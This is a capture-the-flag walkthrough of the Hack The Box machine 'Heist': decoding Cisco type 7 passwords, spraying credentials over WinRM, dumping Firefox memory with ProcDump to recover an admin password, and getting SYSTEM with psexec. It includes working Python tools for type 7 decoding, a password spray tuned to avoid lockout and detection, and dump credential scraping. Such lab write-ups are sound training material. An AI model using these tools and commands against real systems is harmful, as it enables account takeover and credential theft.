HTB - Heist

Getting Root:
We gather a few credentials from a Cisco router configuration after logging in as guest to the web application on port 80. Enumerating the box with enum4linux, smbmap and smbclient using those credentials turned up two additional users. Since the box has port 5985 (WinRM) open, I tested every user/password combination against it and got a shell.
For privilege escalation, Watson, Sherlock, winPEAS, PowerUp's All-Checks and basic manual enumeration did not turn up much. However, Firefox was in the process list, so I dumped its memory with ProcDump from Microsoft Sysinternals.
Analyzing the dump file gave me the Administrator's password, which I then used to log in with evil-winrm.
Nmap
nmap -p- 10.10.10.149
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-09 22:24 EDT
Nmap scan report for 10.10.10.149
Host is up (0.041s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
445/tcp open microsoft-ds
5985/tcp open wsman
49668/tcp open unknown
nmap -sC -sV -p 80,135,445,5985,49668 10.10.10.149
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-09 22:27 EDT
Nmap scan report for 10.10.10.149
Host is up (0.040s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49668/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 45s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-03-10T02:28:53
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.32 seconds
Enumerating SMB
I used smbmap, smbclient, enum4linux and crackmapexec against the box with a null session and none of them returned anything useful.
Enumerating http
Gobuster
http://10.10.10.149:80/attachments (Status: 301) [Size: 158]
http://10.10.10.149:80/css (Status: 301) [Size: 150]
http://10.10.10.149:80/errorpage.php (Status: 200) [Size: 1240]
http://10.10.10.149:80/images (Status: 301) [Size: 153]
http://10.10.10.149:80/Images (Status: 301) [Size: 153]
http://10.10.10.149:80/index.php (Status: 302) [Size: 0]
http://10.10.10.149:80/Index.php (Status: 302) [Size: 0]
http://10.10.10.149:80/issues.php (Status: 302) [Size: 16]
http://10.10.10.149:80/js (Status: 301) [Size: 149]
http://10.10.10.149:80/login.php (Status: 200) [Size: 2058]
http://10.10.10.149:80/Login.php (Status: 200) [Size: 2058]
Going to http://10.10.10.149 redirects to http://10.10.10.149/login.php. I tried admin/admin and a few other combinations but nothing worked. However, there is a "Login as guest" button and I was able to log in with it.

There the user Hazard has attached the configuration of a Cisco router.

The router configuration contains usernames with Cisco type 7 passwords (a reversible fixed-key encoding, not a hash, so they can be decoded directly) and an enable secret (a salted hash, which has to be cracked offline against a wordlist rather than decoded).

Decrypting the Cisco Passwords

Decoding the two type 7 strings and cracking the enable secret gives:

User: rout3r
Password: $uperP@ssword

User: admin
Password: Q4)sJu\Y8qz*A3?d

The enable secret: stealth1agent
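The type 7 decode step above is mechanical, so here it is as an added example (not part of the original write-up). The key is the well-known fixed XOR key IOS uses for type 7; the sample config is constructed for this example (the box's real config file is not reproduced on the page): its two type 7 strings were generated with the encoder below from the two passwords recovered above, and the enable secret line carries a placeholder hash only to show that the parser skips it, since type 5 secrets are MD5-crypt and have to be cracked with john or hashcat rather than decoded.

```python
# Added example (not from the original write-up): encode/decode Cisco IOS
# "type 7" passwords. Type 7 is a fixed-key XOR obfuscation, not encryption,
# so every "username ... password 7 <hex>" line in a leaked config gives up
# the cleartext instantly. An "enable secret 5 ..." line is MD5-crypt and has
# to be cracked with a wordlist (john/hashcat), which this code does not do.

# Well-known fixed XOR key used by IOS for type 7.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"


def cisco_type7_decode(encoded: str) -> str:
    """Decode a type 7 string: two decimal digits of seed, then hex bytes."""
    encoded = encoded.strip()
    if len(encoded) < 4 or len(encoded) % 2:
        raise ValueError("type 7 strings have an even length of at least 4")
    seed = int(encoded[:2], 10)
    if not 0 <= seed <= 15:
        raise ValueError("type 7 seed must be between 00 and 15")
    data = bytes.fromhex(encoded[2:])
    # Each ciphertext byte is XORed with the key byte at (seed + position).
    plain = bytes(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)] for i, b in enumerate(data))
    return plain.decode("latin-1")


def cisco_type7_encode(plain: str, seed: int = 2) -> str:
    """Produce a type 7 string for plain (useful to build test vectors)."""
    if not 0 <= seed <= 15:
        raise ValueError("seed must be between 0 and 15")
    data = plain.encode("latin-1")
    enc = bytes(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)] for i, b in enumerate(data))
    return f"{seed:02d}{enc.hex().upper()}"


def recover_type7_from_config(config: str) -> dict:
    """Return {username: cleartext} for every 'password 7' entry in an IOS config."""
    creds = {}
    for line in config.splitlines():
        parts = line.split()
        if len(parts) >= 4 and parts[0] == "username" and "password" in parts:
            idx = parts.index("password")
            if len(parts) > idx + 2 and parts[idx + 1] == "7":
                creds[parts[1]] = cisco_type7_decode(parts[idx + 2])
    return creds


# Constructed sample config (hypothetical, not the box's file): the two type 7
# strings were generated with cisco_type7_encode() from the passwords recovered
# above, and the enable secret hash is a placeholder that the parser must skip.
SAMPLE_CONFIG = """\
hostname router
enable secret 5 $1$placeholder$notarealhash
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
"""

if __name__ == "__main__":
    for user, password in recover_type7_from_config(SAMPLE_CONFIG).items():
        print(f"{user}: {password}")
```

The seed (the first two digits) only selects where in the key the XOR starts, which is why the same password encoded by two routers can look different while still decoding in microseconds; a `service password-encryption` config protects against nothing but shoulder surfing.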
Enumerating SMB Again
With the new credentials I enumerated SMB again using smbmap, smbclient, enum4linux and crackmapexec. enum4linux was able to get two additional usernames through RID cycling:
S-1-5-21-4254423774-1266059056-3197185112-1012 SUPPORTDESK\Chase (Local User)
S-1-5-21-4254423774-1266059056-3197185112-1013 SUPPORTDESK\Jason (Local User)
Enumerating winrm
I first tried to spray the credentials with crackmapexec, using its smb and winrm modules, but for some reason both kept failing and generating a lot of errors. So I used the Metasploit winrm_login auxiliary module to test every user/password combination instead.
msf5 auxiliary(scanner/winrm/winrm_login) > run
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\hazard:Q4)sJu\Y8qz*A3?d (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\hazard:stealth1agent (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\hazard:$uperP@ssword (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\rout3r:Q4)sJu\Y8qz*A3?d (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\rout3r:stealth1agent (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\rout3r:$uperP@ssword (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\admin:Q4)sJu\Y8qz*A3?d (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\admin:stealth1agent (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\admin:$uperP@ssword (Incorrect: )
[+] 10.10.10.149:5985 - Login Successful: WORKSTATION\chase:Q4)sJu\Y8qz*A3?d
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\jason:Q4)sJu\Y8qz*A3?d (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\jason:stealth1agent (Incorrect: )
[-] 10.10.10.149:5985 - LOGIN FAILED: WORKSTATION\jason:$uperP@ssword (Incorrect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
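The module above walks user by user through all three passwords. As an added example (not from the original write-up), here is the same combination test written as a lockout-aware spray: attempts are ordered password-major so every account sees one guess per round, a user is not retried once a hit is found, and the guesses per account can be capped below the target's lockout threshold. The transport is injected as a callback so the scheduling logic runs offline; `fake_winrm_login` is a constructed stand-in for a WinRM client that accepts only the pair the Metasploit run found.

```python
# Added example (not from the original write-up): lockout-aware credential spray.
from itertools import product

# Users and passwords gathered in the write-up (the password list is what the
# router config gave up).
USERS = ["hazard", "rout3r", "admin", "chase", "jason"]
PASSWORDS = ["Q4)sJu\\Y8qz*A3?d", "stealth1agent", "$uperP@ssword"]


def spray(users, passwords, try_login, max_attempts_per_user=None):
    """Try (user, password) pairs password-major: one guess per account per round.

    try_login(user, password) -> bool is the transport (a WinRM client in the
    real run); it is injected so the scheduling logic runs offline. Returns
    (hits, tried): hits maps user -> working password, tried is the ordered
    list of pairs actually sent. A user is not retried after a hit, and
    max_attempts_per_user (keep it below the target's lockout threshold) caps
    the guesses per account.
    """
    hits, tried = {}, []
    attempts = {u: 0 for u in users}
    for password, user in product(passwords, users):
        if user in hits:
            continue
        if max_attempts_per_user is not None and attempts[user] >= max_attempts_per_user:
            continue
        attempts[user] += 1
        tried.append((user, password))
        if try_login(user, password):
            hits[user] = password
    return hits, tried


def fake_winrm_login(user, password):
    """Simulated WinRM endpoint (constructed): accepts only the pair that worked above."""
    return (user, password) == ("chase", "Q4)sJu\\Y8qz*A3?d")


if __name__ == "__main__":
    hits, tried = spray(USERS, PASSWORDS, fake_winrm_login, max_attempts_per_user=2)
    print(f"{len(tried)} attempts, hits: {hits}")
```

Against a lab box like this one the ordering makes no difference, but against a domain-joined host a user-major loop of a long password list locks accounts out before it reaches the right one, and a locked account shows up in the event log long before a successful logon does.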
Using evil-winrm
# evil-winrm -i 10.10.10.149 -u chase -p "Q4)sJu\Y8qz*A3?d"
Privilege Escalation
Checking the Processes
We notice that Firefox is running. A browser process keeps a lot of cleartext in memory (URLs, form fields, its own command line and environment block), so we can dump it with ProcDump from Microsoft Sysinternals and search the dump for credentials.
C:\Users\Chase\documents> ps
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
1152 72 144940 183780 39.67 752 1 firefox
407 31 17372 62200 3.64 2280 1 firefox
343 19 10032 37420 1.03 2828 1 firefox
390 33 52028 84108 98.34 5996 1 firefox
358 26 16360 37764 0.63 6088 1 firefox
Using the Sysinternals Suite from Microsoft
The specific tool we are interested in is ProcDump.
ProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike. ProcDump also includes hung window monitoring (using the same definition of a window hang that Windows and Task Manager use), unhandled exception monitoring and can generate dumps based on the values of system performance counters. It also can serve as a general process dump utility that you can embed in other scripts.
Started with the first process, PID 752, using -ma for a full memory dump. This works from Chase's unprivileged shell because the browser process is accessible to our own user; dumping a process owned by another user would need SeDebugPrivilege, i.e. administrative rights.
C:\Users\Chase\documents> .\procdump64.exe -ma 752
ProcDump v9.0 - Sysinternals process dump utility
Copyright (C) 2009-2017 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com
[02:50:41] Dump 1 initiated: C:\Users\Chase\documents\firefox.exe_200310_025041.dmp
[02:50:41] Dump 1 writing: Estimated dump file size is 484 MB.
[02:50:45] Dump 1 complete: 485 MB written in 3.6 seconds
[02:50:45] Dump count reached.
Transferred the file to my Kali box using evil-winrm
*Evil-WinRM* PS C:\Users\Chase\documents> download firefox.exe_200310_025041.dmp
Inspecting the file after transfer
# strings firefox.exe_200310_025041.dmp | grep -i password | more
"C:\Program Files\Mozilla Firefox\firefox.exe" localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
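GNU strings only prints 8-bit strings by default, and most text a Windows process holds (environment block, window titles, form data) is UTF-16LE, so a `strings | grep` pass can miss credentials that are sitting in the dump; rerunning with `strings -el` covers the 16-bit case. As an added example (not from the original write-up), the following searches a raw dump for the login URL pattern seen above in both ASCII and UTF-16LE at either byte alignment, and percent-decodes the values. The sample dump is constructed for the example: it embeds the URL from the page as ASCII and as UTF-16LE, plus a second, hypothetical percent-encoded login for `test@example.com` to show the decoding.

```python
# Added example (not from the original write-up): pull credentials out of a raw
# process dump the way the strings | grep step does, but covering both ASCII and
# UTF-16LE text and decoding the URL encoding of the captured values.
import re
from urllib.parse import unquote

# The form field names come from the login URL seen in the dump.
CRED_RE = re.compile(r"login_username=([^&\s\x00]+)&login_password=([^&\s\x00]+)")


def _text_views(blob: bytes):
    """Yield the dump as text in each encoding worth searching."""
    yield blob.decode("latin-1")                          # 8-bit / ASCII strings
    yield blob.decode("utf-16le", errors="ignore")        # UTF-16LE, even offset
    yield blob[1:].decode("utf-16le", errors="ignore")    # UTF-16LE, odd offset


def extract_url_credentials(blob: bytes) -> list:
    """Return unique (username, password) pairs found in blob, in order of appearance."""
    found, seen = [], set()
    for text in _text_views(blob):
        for match in CRED_RE.finditer(text):
            pair = (unquote(match.group(1)), unquote(match.group(2)))
            if pair not in seen:
                seen.add(pair)
                found.append(pair)
    return found


# Constructed sample "dump": the URL from the write-up embedded as ASCII (the
# command line), as UTF-16LE (how Windows stores the environment block) and a
# hypothetical percent-encoded login, padded with filler bytes.
URL = ("localhost/login.php?login_username=admin@support.htb"
       "&login_password=4dD!5}x/re8]FBuZ&login=")
SAMPLE_DUMP = (
    b"\x00" * 16
    + b'"C:\\Program Files\\Mozilla Firefox\\firefox.exe" ' + URL.encode("ascii")
    + b"\x00" * 7
    + ("MOZ_CRASHREPORTER_RESTART_ARG_1=" + URL).encode("utf-16le")
    + b"\xff" * 5
    + b"login_username=test%40example.com&login_password=p%40ss%20word&login="
    + b"\x00" * 8
)

if __name__ == "__main__":
    for user, password in extract_url_credentials(SAMPLE_DUMP):
        print(f"{user}: {password}")
```

On a real 485 MB dump, read the file with `open(path, "rb").read()` and pass the bytes in; the three decode passes are still far cheaper than transferring the file, and the regex can be widened to whatever parameter names the target application uses.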
Got some creds from the dump. Firefox was launched with the login URL carrying the credentials as query parameters, and both its command line and the crash reporter's restart argument (MOZ_CRASHREPORTER_RESTART_ARG_1) keep that URL in memory in the clear:
User: admin@support.htb
Password: 4dD!5}x/re8]FBuZ
The web admin password is reused for the local Administrator account: testing it with evil-winrm as Administrator logs in successfully.
Got a shell as SYSTEM with Impacket's psexec.py, which uploads a service binary to the ADMIN$ share and starts it as a service, so the resulting shell runs as LocalSystem rather than as Administrator:
psexec.py Administrator:'4dD!5}x/re8]FBuZ'@10.10.10.149
Impacket v0.9.21.dev1+20200225.153700.afe746d2 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 10.10.10.149.....
[*] Found writable share ADMIN$
[*] Uploading file xvhnmTQR.exe
[*] Opening SVCManager on 10.10.10.149.....
[*] Creating service lCrZ on 10.10.10.149.....
[*] Starting service lCrZ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.437]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>